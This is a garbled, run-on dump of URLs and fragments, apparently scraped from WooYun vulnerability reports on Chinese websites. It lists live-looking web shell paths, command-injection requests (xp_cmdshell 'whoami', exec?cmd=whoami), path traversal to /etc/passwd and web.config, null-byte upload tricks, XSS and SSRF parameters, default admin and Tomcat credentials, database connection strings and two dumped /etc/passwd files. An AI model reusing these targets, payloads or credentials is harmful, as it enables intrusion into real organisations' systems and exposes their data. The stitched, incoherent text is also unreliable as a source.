http://121.14.65.122/she11.jsp http://www.flyertrip.com/member/login.php http://222.76.211.92:8090/linxuan_API.svc?wsdl http://www.shenmafuli.com/?a=productlist&c=About&fr=&kw=1 http://**.**.**.**/elearning2/home/login.action?course.uuid=3b8d6caa-a19e-11e2-97b7-ac162da4b60d存在命令执行漏洞 http://www.yinlu.com/login.aspx http://**.**.**.**/new.asp?id=922 http://olms.sinopec.com/slmwebapp/ http://**.**.**.**/login.aspx上海实业 http://mae.swu.edu.cn/ http://mae.swu.edu.cn/newsx.php?id=53,参数id http://txj.baomihua.com/ http://wlz.baomihua.com/ http://yxl.baomihua.com/ http://xxcq.baomihua.com http://wz.baomihua.com/ http://qy.baomihua.com/ http://kt.baomihua.com/ userapi.asmx/UserLogin?jsoncallback=jQuery18304828840980174135_1449839526143&userName=111111&password=123456&WGTAGS=0.007041393915503735&_=1449839622552 https://vfs.saicfc.com/vfs2/login.htm https://github.com/Samin-Du/mypackage/blob/a9f29549ed889084b7abb51eb1e753ff7d752b5d/tool/mycmd/conf/my.conf http://**.**.**.**:8001/console/ http://120.55.172.222:7001/tcmp/ http://120.55.172.222:7001/console http://120.55.172.222:7001/ca/ma3.jsp jdbc:oracle:thin:@10.253.2.212:1521:ora10g http://**.**.**.**/member.asp?B=15&S=10 http://**.**.**.**/teacher.asp?B=10&S=4 http://**.**.**.**/news_view.asp?ID=540 http://**.**.**.**/download.asp?B=14&S=7 http://**.**.**.**/content_type.asp?B=36&S=55 http://c1.t3.com.cn:7001/ http://**.**.**.**/messager/users.data可以获取到所有员工信息的base64编码后的数据,通过base64解码: http://wenwen.m.sogou.com/mq/qudetail.jsp?qid=591441973&ch=wap3.se.wa.re.an1&w=%26lt%3Bscriptalert%2Fscript%26gt%3B&&g_ut=3 http://wenwen.m.sogou.com/mq/qudetail.jsp?qid=272615006&ch=wap3.se.wa.re.an2&w=%26lt%3Bscriptalert%2Fscript%26gt%3B&&g_ut=3 http://wenwen.m.sogou.com/mq/qudetail.jsp?qid=184961373&ch=wap3.se.wa.re.ann&w=%26lt%3Bscriptalert%2Fscript%26gt%3B&&g_ut=3 http://wenwen.m.sogou.com/mq/qudetail.jsp?qid=361945477&ch=wap3.se.wa.re.ann&w=%26lt%3Bscriptalert%2Fscript%26gt%3B&&g_ut=3 
http://wenwen.m.sogou.com/mq/qudetail.jsp?qid=368729891&ch=wap3.se.wa.re.ann&w=%26lt%3Bscriptalert%2Fscript%26gt%3B&&g_ut=3 http://121.49.98.253:8080 http://weibo.com/p/aj/proxy?api=http%3A%2F%2Fcontentrecommend.mobile.sina.cn http://contentrecommend.mobile.sina.cn@123.57.73.3/wb.php http://weibo.com/p/aj/proxy?api=http%3A%2F%2Fcontentrecommend.mobile.sina.cn%40123.57.73.3%2Fwb.php http://123.57.73.3/wb.php http://210.41.225.141:8080/Index.aspx http://**.**.**.**/Info/news_view.asp?id=172 http://**.**.**.**/ http://web.cfae.cn/index1.jsp http://web.cfae.cn/login1.jsp?siteId=testaaa&Language=Chinese http://web.cfae.cn/login1.jsp?siteId=testabc&Language=Chinese http://web.cfae.cn/login1.jsp?siteId=agri&Language=Chinese http://web.cfae.cn/login1.jsp?siteId=beta&Language=Chinese http://web.cfae.cn/login1.jsp?siteId=bjttsc&Language=Chinese http://web.cfae.cn/login1.jsp?siteId=jgdw&Language=Chinese http://m.flyertrip.com/index.php/Admin/Login/login http://training.tsinghua.edu.cn/vote/view/login.jsp t.cn/RUmS2UC http://wenwen.sogou.com/qunapp/new-remind/ http://**.**.**.**/bugs/wooyun-2010-095464 http://**.**.**.**/component_news/zcfc_index.php?tn=zcfc http://**.**.**.**/news/?tn=news http://**.**.**.**/OnlineQuestion.aspx?key=3dd9255b-758c-4198-9b08-9924acd64ba6 http://**.**.**.**/user/login http://**.**.**.**/user/login http://manage.st.octmami.com/wap/detail/index?goods=2926 http://180.97.34.130:8000 http://180.97.34.130:8000/pano.gate.html#/search http://180.97.34.130:8000/pano.correct.html http://**.**.**.**:59009/VIPNMS/login.action存在命令执行漏洞 http://c2.t3.com.cn:7001 http://lcbt.yicai.com/yicai/index.php/Home/Index/news/classify/6/pid/130/id/140/p/3.html www.huayiyuan.com http://act.07073.com/index/index?act=txhc_20151210&mod=screenshot&fun=getMyImageStatus url:email.gee.com.cn http://**.**.**.**/bh_news.display.php?id=620 http://**.**.**.**/bh_news.display.php?id=620 https://**.**.**.**/ http://**.**.**.**/gps/doif/myLogin.jsp http://wbgh.youxinpai.com/login/ 
http://**.**.**.**/bugs/wooyun-2010-0145656 http://**.**.**.**:8001/console http://**.**.**.**/bugs/wooyun-2015-0160216。今天早上想了一下,会不会是同一个技术提供商做的通用服务。于是。发现了西安新势力网络。 http://**.**.**.**/index.html http://**.**.**.**/xtw/shye/Personnel_news.asp?id=31&bh=3404 http://**.**.**.**/YuanBu_elegant_demeanour.asp?id=120&bh=12585 http://**.**.**.**/News_center.asp?id=19&bh=1365 http://**.**.**.**/Shiyanshi_News.asp?id=13&bh=195 http://**.**.**.**/Recruitment_of_students_employment.asp?id=32&bh=1380 http://**.**.**.**/user/City_ajax.aspx?CityId=798729681522 http://admin.hp1997.com http://**.**.**.** http://**.**.**.** http://**.**.**.**/service.asmx hzbank.com.cn/123456 hzbank.com.cn/123456 hzbank.com.cn/hzbankhr123 hzbank.com.cn/hzbankhr123,但因登录时需要扫描二维码无法登录; http://www.spider.com.cn/userlogin.html?returnurl=http%3A%2F%2Fwww.spider.com.cn%2F此处接口验证码设计缺陷,输入正确一次一直正确,可以绕过验证码 http://b2b.chinalh.com/login/ http://218.1.100.235 http://**.**.**.** http://**.**.**.**/pweb/careerapply/HrmCareerApplyWorkView.jsp?id=1 http://**.**.**.**/user/login.aspx http://**.**.**.**/Account/LogOn http://**.**.**.**/ https://mail.ceair.com http://union.ceair.com/ http://airport.csair.com/SelfMonitoring/CussMain.do?method=selectData&city=ALL http://safety.ceair.com:7500/sms/sms/safty/employeereport/emReportHome.zul http://oa.daojia.58.com http://www.cjn.cn/ http://220.194.29.181:7001/console/login/LoginForm.jsp存在Java反序列化漏洞 http://121.43.74.72:7005/tit-ydcd/ http://121.43.74.72:7005/ca/ma3.jsp jdbc:mysql://rdsx89pe30tuivsptgpa1.mysql.rds.aliyuncs.com:3306/dyxptdb?zeroDateTimeBehavior=convertToNull http://**.**.**.**:44445/NetInfo/ViewIpPwd.aspx http://**.**.**.**:6888/userAction.struts?actionType=entrySystem http://**.**.**.**:6888/deployLogin.struts http://**.**.**.**:44401/(ie访问比较好) user:admin user:admin pass:admin http://**.**.**.**/ http://**.**.**.**:80/ url:http://121.41.30.169:8080/manager/html user:tomcat pass:tomcat http://project.haier.net http://**.**.**.**/ http://www.lesuke.com/getPwd.jsp 
http://**.**.**.**/about/news/news_view.php?id=213 http://**.**.**.**/login.aspx http://**.**.**.**/index.html http://**.**.**.**/seeyon/index.jsp http://**.**.**.**/data.rar http://t.cjn.cn/user/login.php http://**.**.**.**/index.php?m=content&c=index&a=lists&catid=18 http://xj.ad.sogou.com/adinsp/user/index http://**.**.**.**/Infor/LostAndFound.aspx http://**.**.**.**/ http://**.**.**.** http://weixin.hztraining.com/ www.hzmedia.com.cn http://weixin.hztraining.com/w/reader.aspx?id=983fa362-6a0c-4aa8-9788-8f7281ebf007_1 http://weixin.hztraining.com http://demo.kalcaddle.com/index.php?user/loginSubmit http://demo.kalcaddle.com/data/kodbox/index.php,可以看到网站根目录: mba.cup.edu.cn/search/index/?key=gg http://oa.sy-yy.com:8989/wap/login.jsp http://oa.sinopharmholding.com/ http://**.**.**.**//newlist.php?leixing= http://www.longone.com.cn/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://www.longone.com.cn/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://dev.gfan.com http://bbs.gfan.com/ www.sdcofco.com http://rtx.800bestex.com:8012/ http://rtx.800bestex.com:8012/admin.php http://rtx.800bestex.com:8012/selectdept.php http://rtx.800bestex.com:8012/rtxcsetup.exe http://www.gufensoso.com/search/?q=intitle%3A%22GourdScan%22 http://www.olfushi.com/ http://www.youziyu.com但是这个还没有。 http://ilife.homelink.com.cn/aigou/admin.php?m=Index&a=login http://open.shopex.cn/.git/ http://**.**.**.**/index.php?option=mainmenu&task=showpage&id=11 http://www.zf_**.**.**.**/GetStuCheckinInfo soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:soapenc="http://**.**.**.**/soap/encoding/ xmlns:tns="http://**.**.**.**/ xmlns:types="http://**.**.**.**/encodedTypes xmlns:soap="http://**.**.**.**/soap/envelope/ soap:Body soap:encodingStyle="http://**.**.**.**/soap/encoding/ q1:GetStuCheckinInfo xmlns:q1="http://www.zf_**.**.**.**/GetStuCheckinInfo xsi:type="xsd:string xsi:type="xsd:string 
xsi:type="xsd:string q1:GetStuCheckinInfo soap:Body soap:Envelope http://**.**.**.**/ForgetPwd.action存在命令执行漏洞 http://**.**.**.**/news_show.asp?UidA=6&UidB=16&id=1024 http://**.**.**.**/news_cx.asp?cx_1=1&cx_2=66&cx_3=1&cx_4=title&cx_5=addtime&cx_6= http://**.**.**.**/zxQuestion.aspx?DoctorID=1 http://**.**.**.**/upfiles/8f5560a8-a0f4-45e0-a073-631c1a049156.aspx http://zsjyxy.scnucas.com/system/about/indexDetails.asp?Id=1 http://zsjyxy.scnucas.com/adminuser/login.asp http://mall.juran.cn/myspace/userinfo/taddresses.htm http://mall.juran.cn http://shouyou.sogou.com/download.html?gid=wan_1570&source=shouyou.sogou.com%27*%23 http://**.**.**.**/ http://219.143.252.185 http://**.**.**.**/shownews.asp?id=410 user:admin password:123456 https://github.com/LeeAce/FASystem http://www.hydron.com.cn/product.php?id=1 http://www.ytzq.com/main/index.shtml https://service.ytzq.com/service/cgi-bin/ytzq/cfzj/sso/action/LostPasswordAction?function=resetPassword http://support.chanjet.com/ http://ka.gfan.com/### http://**.**.**.**/PMS/ http://**.**.**.**:8002/logonAction.do?actionType=newlogon http://**.**.**.**/ http://**.**.**.**/webroot/article.php?art=612 http://www.mlairport.com/autoweb/autoweb/ml_index.html http://www.mlairport.com/autoportal/AlbumUpload http://www.mlairport.com/autoportal/AlbumUpload http://office.lbxdrugs.com/seeyon//logs/login.log http://office.lbxdrugs.com/seeyon/ http://ilife.homelink.com.cn/aigou/admin.php?c=index&a=orderdetail&oid=1449916178 http://**.**.**.**/login http://**.**.**.**/wap/user!forgetPwd.action存在命令执行漏洞 http://jw.tjrac.edu.cn/ http://**.**.**.**/zxDeptList.aspx?Dept=%C9%F1%BE%AD%C4%DA%BF%C6 http://**.**.**.**/plHealthWikiInfo.aspx?ID=74 http://**.**.**.**/data/admin/ver.txt http://**.**.**.**/include/dialog/select_soft_post.php http://game.weibo.com/site/user/ajaxFollow http://game.weibo.com/home/user/ajaxFollow http://book.weibo.com/newcms/i/weibo_relation.php http://game.weibo.com/site/user/ajaxFollow 
http://**.**.**.**/bugs/wooyun-2014-073731。。。上次是万能密码登录,这次是弱口令 https://imt.rajax.me http://**.**.**.**:16080/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin schedule:x:500:500::/home/schedule:/bin/bash pos:x:501:501::/home/pos:/bin/bash webpolicy:x:502:502::/home/webpolicy:/bin/bash jygx:x:503:503::/home/jygx:/bin/bash jhcard:x:504:504::/home/jhcard:/bin/bash catlog:x:505:505::/app/webpolicy/jboss-4.0.4.GA/server/default:/bin/bash 
secheck:x:20001:20001::/home/secheck:/bin/bash http://202.108.145.52/ http://**.**.**.**/ http://**.**.**.**/wooyun/index.jsp http://union.ceair.com/web/ResetPassWord.aspx?loginuser=xxxx http://**.**.**.**/ http://**.**.**.**//tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/null上传的文件名.jsp http://**.**.**.**,端口是443: http://lianjie.crland.com.hk/Webs/HR/News_list.aspx?type=k http://www.svwstar.com/epms/ http://**.**.**.**/images/data_bak/120/G/ http://**.**.**.**/images/data_bak/120/G/Microsoft%20SQL%20Server/ http://**.**.**.**/images/data_bak/120/G/database/%E6%95%B0%E6%8D%AE%E5%BA%93%E5%A4%87%E4%BB%BD/ http://**.**.**.**/images/data_bak/120/F/%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6%E5%A4%B9/ http://**.**.**.**/userreg.aspx?u=20130925003 http://210.22.85.50/ http://116.236.253.178/ http://**.**.**.**:7001/index/openRoad.do http://**.**.**.**:7001/test.jsp http://**.**.**.**/ http://tianjin.daojia.com.cn/food_search.php?a=2&r=5069&char=A http://pm.feihe.com/GetPassWord.aspx http://community.edufe.com.cn/space/index.php?blogid=105684 http://121.14.65.115:8080/she11.jsp http://121.14.65.116:8080/she11.jsp http://121.14.65.117:8080/she11.jsp http://**.**.**.**/tw/ http://**.**.**.**/tw/newspost.php?id=3778 http://**.**.**.**/defaultroot/public/jsp/singleupload.jsp?path=desktop&visualName=unitImgName&hiddenName=unitImgSaveName&del=yes http://**.**.**.**/defaultroot/upload/desktop/2015121300213481202609893.jsp http://219.143.230.132:8080/slrs/login_login.action http://plf.kingreader.com/Frameworks/Admin/Security/UserLogin.aspx?refer=http%3a%2f%2fplf.kingreader.com%2fDefault.aspx http://ubc.ecnu.edu.cn/front/artical_preview.php?tag_ID=5&&action=moduleArts&&page=5&&pageRange=1 http://itcs.ecnu.edu.cn/ http://itcs.ecnu.edu.cn:80/ http://www.letv.com/ http://m.letv.com/ http://mail.huatu.com/ http://**.**.**.**/news_detail.php?d=1241 http://**.**.**.**/file/fileView.action?fileInfo.state=0&userFile.FId=209&userFile.id=8031 
http://www.edufe.com.cn/special/mxxhg2014/show.php?contentid=1710 http://**.**.**.**:9000/wcm/app/login.jsp http://**.**.**.**:9000/wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin http://**.**.**.**:9000/wcm/app/login.jsp即完成绕过 http://**.**.**.**:9000/wcm/services http://media.ecnu.edu.cn/.git/ http://202.120.83.100/sggl/wsjj/index.jsp?mainpath=zcgysDetails.jsp?flag=201305280003835721 http://202.120.83.100/sggl/wsjj/index.jsp?mainpath=../../WEB-INF/web.xml http://202.120.85.11:8080 http://202.120.88.141 http://www.fblife.com/ajax.php?a=change&c=news&id=159828&ids=159828&pages=10&pagesize=6&t=1449712075984&tags=%E7%A6%8F%E7%89%B9 http://news.fblife.com/ajax.php?a=change&c=news&id=165338&ids=165338&pages=10&pagesize=6&t=1449710700034&tags=%E6%8D%B7%E8%B1%B9F-PACE%20%E5%B9%BF%E5%B7%9E%E8%BD%A6%E5%B1%95 http://fax1.sfn.cn/Admin/login.aspx http://fax1.sfn.cn http://**.**.**.**/index.php?Act=article&PK=19&MK=44 http://**.**.**.**/liveroom/Handler/Default.ashx?action=GetSubjectList&isVisible=true&pageIndex=1&pageSize=5&guid=1449942744338&orderExpression=PublishTime+DESC http://xlzx.nju.edu.cn/ http://xlzx.nju.edu.cn/inc/upload.asp?fl=1.asp;1 http://hxlm.xmu.edu.cn/ http://www.qxzxp.com/3019.html http://222.24.192.146/ http://**.**.**.**/web/find.aspx?Key=% http://220.112.36.116:8080/login.action http://spxy.swu.edu.cn/ http://baoxian.jrzj.com/index.php?m=insurance&c=index&a=viewpdf&planId=516 http://**.**.**.**/UploadFiles/201511221243487465.cer http://**.**.**.**/AdminManage/Login.aspx http://**.**.**.**/AdminManage/frame/Main.aspx http://**.**.**.**//UploadFiles/2015112212215962665.cer http://**.**.**.**/AdminManage/Login.aspx http://zhichi.ufida.com.cn/jinrong/ http://zhichi.ufida.com.cn/jinrong/ErrorPage.aspx?aspxerrorpath=/jinrong/WebManage/UserLogon.aspx http://zhichi.ufida.com.cn/jinrong/ http://**.**.**.**/misc.php?mod=syscode&pnumber=1 http://**.**.**.**/misc.php?mod=syscode&pnumber=1 
http://oa.buwei.co//misc.php?mod=syscode&pnumber=1 ftp://14.23.175.4/ http://www.hrth806.com/admin/left.aspx http://www.hrth806.com/Login.aspx http://**.**.**.** https://mail.tcl.com/owa/ http://gouuse.xinnet.com/ http://pols.ecnu.edu.cn http://pols.ecnu.edu.cn/admin/admin.php http://arc.ecnu.edu.cn/news/manage/login/login.asp http://eng.ecnu.edu.cn/ http://eng.ecnu.edu.cn/news-show.php?id=51 http://mail.faw.com.cn/ http://**.**.**.**/oa/HX_manage http://us.autonavi.com http://us.autonavi.com/navisoftware/tips root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System bus:/:/sbin/nologinvcsa:x:69:69:virtual owner:/dev:/sbin/nologinabrt:x:173:173::/etc/abrt:/sbin/nologinsaslauth:x:499:76:"Saslauthd saslauth:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinoprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologinbacula:x:133:133:Bacula System:/var/spool/bacula:/sbin/nologinradiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashdovecot:x:97:97:Dovecot server:/usr/libexec/dovecot:/sbin/nologindovenull:x:498:499:Dovecot's user:/usr/libexec/dovecot:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinqpidd:x:497:498:Owner 
Daemons:/var/lib/qpidd:/sbin/nologinautonavi:x:500:500::/home/autonavi:/bin/bashnagios:x:501:501::/home/nagios:/sbin/nologinzabbix:x:502:502::/home/zabbix:/bin/bashzongning:x:503:503::/home/zongning:/bin/bash http://sunsunplus.51.net/text.php?tid=1292 http://mail.faw.com.cn/ http://chr.sdu.edu.cn/admin/login.htm http://www.guoshi.com/css/index.css/%20\0.php http://science.guoshi.com/skin/2/main.css%00.php http://ketan.guoshi.com/cssnew/basic.css%00.php http://weibo.guoshi.com/style/main.css%00.php http://122.224.232.58/ http://b.daojia.com.cn/service.php?action=2147483649&user=admin&uid=1449954143596 http://tiku.huatu.com/index.php?mod=user&act=login http://wbgh.youxinpai.com/login http://**.**.**.**/content/24380 http://**.**.**.**/index.php/Public/login.shtml url:http://218.241.230.35:80/manager/html user:tomcat pass:tomcat http://218.241.230.35/wooyun/ http://**.**.**.**/bns/query/Query/ipwhoisQuery.do?txtquery=**.**.**.**&queryOption=ipv4 http://**.**.**.**/ user:admin pass:admin http://**.**.**.**:8080/welcome.action存在命令执行漏洞 http://202.104.30.113:8080/ http://mail.huatu.com http://219.141.242.77:7777/pe-admin/ http://219.141.242.77:7777/pe-admin/main.jsp http://youxi.baidu.com/developerDemo/demo.jsp http://wbgh.youxinpai.com http://**.**.**.**/zhuanr_info.jsp?proid=a506ebff-a209-11e5-896b-40f2e925905a http://58.20.40.247:7001/duizhang/ http://58.20.40.247:7001/console/ https://61.187.87.92/ http://61.187.87.92:7001/console www.fxhotels.com主站存在SQL注入: http://www.fxhotels.com/index.aspx http://www.fxhotels.com/addhotels.aspx http://61.184.32.10:8888/ http://219.141.214.23:8091 cn:88使用的是weblogic,但是该版本还存在java反序列化漏洞。 http://218.87.194.57:8080/suppler/login/login_login.action http://218.87.194.57:8080/suppler/user/config.jsp http://218.87.194.57:8080/suppler/js/conn.jsp http://218.87.194.57:8080/suppler/js/config.jsp http://home.renhe.com/login/login_index.h http://home.renhe.com/uploads/2015/12/14/201512348124337.253.jsp 
http://home.renhe.com/uploads/2015/12/14/config.jsp http://home.renhe.com/js/conn.jsp http://home.renhe.com/manage.jsp Id:0;996 Package:Negotiate User:NETWORK Id:0;1100461 Package:NTLM User:rhzjzc Domain:WWW-6C265A4688B Id:0;997 Package:Negotiate User:LOCAL http://219.142.83.10/Lams/login http://**.**.**.**/ http://**.**.**.**/forgetpwd.html http://**.**.**.**/pages/ListBook.aspx?SID=1876&FID=20&SFL=B1 http://www.gifa.com.cn/wp-login.php http://**.**.**.**/yb.asp?id=7 http://**.**.**.**/page/count.asp?artid=1&jobid=&topicid= http://mail.faw.com.cn http://**.**.**.**/mainpages/more.aspx?Keywords=%2 http://**.**.**.**/cases/view.php?id=129&type=js http://**.**.**.**/cases/view.php?id=129&type=js http://**.**.**.**/cases/view.php?id=129&type=js http://**.**.**.**/cases/view.php?id=129&type=js http://**.**.**.**/cases/view.php?id=129&type=js http://**.**.**.**/cases/view.php?id=129&type=js ftp://px.kysec.cn/ http://www.hk.cntaiping.com http://www.hk.cntaiping.com/include/getfile.php?filepath=路径&file=名字+格式&filename=名字 http://**.**.**.**/searchart.php?id=&gid=16866&artname=M&button= http://**.**.**.**/searchart.php?id=&gid=16866&artname=M&button= http://**.**.**.**/admin/loginAdminUser.action http://wooyun.org/bugs/wooyun-2015-0149748 http://111.203.203.1/WebContent/pay.jsp http://111.203.203.1/she33.jsp http://115.28.138.184/index.jsp,呵呵,直接把系统的密码都暴露了,I服了You http://115.28.138.184/shopxx/admin/admin!login.action存在struts2 http://sell.ips.com.cn/User/UserAddress.aspx http://sell.ips.com.cn/User/GetUsrAddressInfo.ashx http://uc.wasu.cn/wu/ http://old.homeinns.com http://mail1.dict.cn/result_list.aspx?id=20151213194359983 http://211.150.67.33:7001/console/login/LoginForm.jsp http://hq.fruitday.com:88/login/Login.jsp?logintype=1 http://jy.xmu.edu.cn/ http://jy.xmu.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe5882&bulletinId=e2467c3e-2906-11e4-a51e-dba799bccc82 http://**.**.**.**/Csbtv/20151109/1_1_13516.HTM 
http://**.**.**.**:8686/zhcsserver/AddSmsVerifyCode.action http://**.**.**.**:8686/zhcsserver/help.jsp jdbc:oracle:thin:ZHCSUSER/ZHCSUSER@**.**.**.**:1533/dbjlg jdbc:mysql**.**.**.**:13306/zhcs_test?useUnicode=true&characterEncoding=UTF-8 http://**.**.**.**:8686/zhcsserver/AddCustomer.action?verifyCode=22199&y0105=ANDROID&password=200bb762aa5503de7fdb2ec6b5cbe991&telephone=13036786808&y0103=714319473283964856&y0102=3614525008582196830&osversion=android4.2.2&appversion=1.7&connecttype=WiFi&phonetype=vivo+Y15T&setupsource=%E8%B1%8C%E8%B1%86%E8%8D%9A%E5%BC%80%E6%94%BE%E5%B9%B3%E5%8F%B0&localprovince=%E6%B9%96%E5%8D%97%E7%9C%81&localcity=%E9%95%BF%E6%B2%99%E5%B8%82&localcounty=%E6%9C%9B%E5%9F%8E%E5%8C%BA http://**.**.**.**/company/login http://210.44.176.44 http://210.44.176.45 http://210.44.176.45 http://219.143.213.248/ http://119.254.105.172:7001/jmxroot/jmxroot.jsp http://mail.huatu.com/ http://**.**.**.**/upload/download/ http://**.**.**.**/images/ http://221.6.196.57:8082/ http://221.6.196.57:8082/ModelTemplate/Details/-1 http://kybpc.chexian.sinosig.com http://**.**.**.**/n1360/n26526/26741.html http://**.**.**.**/invoker/JMXInvokerServlet未删除 http://**.**.**.**/detail.aspx?id=80272 http://**.**.**.**/xianlusearch.html?xlfl=%E5%8C%BA%E5%A4%96%E7%BA%BF%E8%B7%AF http://**.**.**.**/PerformSearch.aspx?search= http://**.**.**.**/showArticle.action?artId=1410890820313 http://**.**.**.**/jpg/setEmailSender.asp http://61.184.32.10:8888/ http://61.184.32.10:8888/info/suggest.do http://**.**.**.**/listCourse.action?mcatgcd=N&scatgcd=P006 http://app.cjn.cn/apps/ http://oa.gykgah.com/yyoa/index.jsp https://**.**.**.**/ https://**.**.**.**//entry.php?action=getUserinfo2&userId=1 https://**.**.**.**//entry.php?action=getUserinfo2&userId=1 http://**.**.**.**/index.php?site=1&page_id=30&ids=733 http://www.scrcoa.com/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://59.57.252.59 http://m.iiyi.com/login/ http://cts.tcl.com/../admin/index.aspx 
http://cts.tcl.com/admin/ http://cts.tcl.com/admin/system/system.aspx http://www.sunyard.com/se_result.php www.sunyard.com http://218.246.22.194:8080/vmain/login.jsp http://218.246.22.194:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27whoami%27 http://api2.elnet.cn:8080/elws/axis2-admin/ http://api2.elnet.cn:8080/elws/services/Cat/exec?cmd=whoami http://oa.sy-yy.com:8989/yyoa/ http://oa.sy-yy.com:8989/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://www.sunyard.com/ http://www.sunyard.com/ www.sunyard.com http://www.bj-jhhj.com/ckfinder/ckfinder.html http://60.28.104.133:9060/yyoa/ http://60.28.104.133:9060/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://www.daojia.com.cn/review.php?a=83&r=2003 http://m.qk365.com/admin/selfservice/pay.jsp http://m.qk365.com/admin/selfservice/complaint.jsp http://**.**.**.**/members/pages.php?ID=apply http://hneta.csu.edu.cn/ http://hneta.csu.edu.cn http://1.85.40.239:8080/ index.php/openapi/pam_callback/login/module/pam_passport_basic/type/shopadmin/appid/desktop/redirect/aHR0cDovL29pbS5sYWl5aWZlbi5jb20vaW5kZXgucGhwLw%3D%3D http://oim.laiyifen.com http://www.njxt.net:8000 http://www.njxt.net:8000/scmanage/index.aspx?sid=22&uname=0022029 http://www.njxt.net:8000/scmanage/index.aspx?sid=52&uname=0193001 http://www.njxt.net:8000/scmanage/index.aspx?sid=166&uname=0104060 http://www.njxt.net:8000/image/studentimg/166/ http://www.njxt.net:8000/ashx/download.ashx?/scManage/学事通校园管理员-最新版.pdf http://www.njxt.net:8000/ashx/download.ashx?/web.config http://www.njxt.net:8000/scmanage/index.aspx?sid=166&uname=0104060 http://www.njxt.net:8000/flash/up.swf?url=/ashx/SaveFile.ashx&Img=/image/studentimg/166/df4fe0d2-f2b2-4e8b-9d58-724fd2ce8caf.aspx&call=FlashCall http://www.njxt.net:8000/image/studentimg/166/df4fe0d2-f2b2-4e8b-9d58-724fd2ce8caf.aspx http://www.njxt.net:8000/image/studentimg/166/724e49b4-b103-47af-b07e-3ad66047f93a.aspx 
